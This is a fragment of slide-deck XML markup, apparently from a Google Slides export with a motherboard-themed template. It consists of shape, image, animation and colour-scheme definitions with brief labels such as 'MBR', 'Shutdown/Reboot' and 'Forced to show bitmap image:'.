                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>MBR</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994" name="Google Shape;994;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751550" y="1268738"/>
            <a:ext cx="1784400" cy="2294100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D8313A"/>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377d791912d1e181d42a130303fdcda1983c846c45944bc1206a0755823a88bdfe078044850511925c34d79073b7985cdbbe847a6caca6c76824e44a13df873360ca714f43fe3acc2bc44a</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p40"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="996" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7715200" y="2412199"/>
            <a:ext cx="427200" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997" name="Google Shape;997;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605500" y="1118075"/>
            <a:ext cx="109800" cy="2591700"/>
          </a:xfrm>
          <a:prstGeom prst="righ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998" name="Google Shape;998;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8142400" y="2063700"/>
            <a:ext cx="704200" cy="70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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="991"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="992"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="exit" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect filter="fade" transition="out">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="995"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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4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Shutdown/Reboot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005876" y="1216750"/>
            <a:ext cx="4418125" cy="3298801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Google Shape;1005;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849575" y="2367750"/>
            <a:ext cx="26691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Forced to show bitmap image:</a:t>
            </a:r>
            <a:endParaRPr b="1"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000"/>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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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pic>
        <p:nvPicPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682750" y="414488"/>
            <a:ext cx="5778501" cy="4314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therboard and Microprocessor by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="011027"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="21DFD8"/>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